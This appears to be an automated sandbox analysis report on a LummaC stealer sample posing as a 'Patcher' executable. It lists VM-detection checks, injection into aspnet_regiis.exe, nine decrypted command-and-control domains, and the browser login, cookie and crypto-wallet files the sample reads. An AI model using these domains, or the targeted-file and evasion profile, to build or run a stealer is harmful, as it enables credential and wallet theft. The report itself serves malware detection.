Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory allocated: 24A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory allocated: 26C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory allocated: 24A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe TID: 7320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7356	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7356	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1768289375.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D46000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C80BE0 LdrInitializeThunk,

2_2_72C80BE0

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Code function: 0_2_6CDE794A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CDE794A

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Code function: 0_2_6CDED6EB GetProcessHeap,

0_2_6CDED6EB

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE7471 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CDE7471
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE794A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDE794A
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDEB917 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDEB917

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Patcher_I5cxa9AN.exe	String found in binary or memory: wholersorie.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: framekgirus.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: nearycrepso.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: abruptyopsn.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: cureprouderio.click
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: rabidcowse.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: cloudewahsj.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: tirepublicerj.shop
Source: Patcher_I5cxa9AN.exe	String found in binary or memory: noisycuttej.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C40000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C41000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C85000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C88000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C96000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C41000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C85000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C88000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72C96000	Jump to behavior
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2B1D008	Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Code function: 0_2_6CDE7B18 cpuid

0_2_6CDE7B18

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Queries volume information: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Code function: 0_2_6CDE7593 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CDE7593

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: aspnet_regiis.exe, 00000002.00000002.1770596085.00000000053B3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729802016.00000000053B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000002.00000003.1729922454.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe, 00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
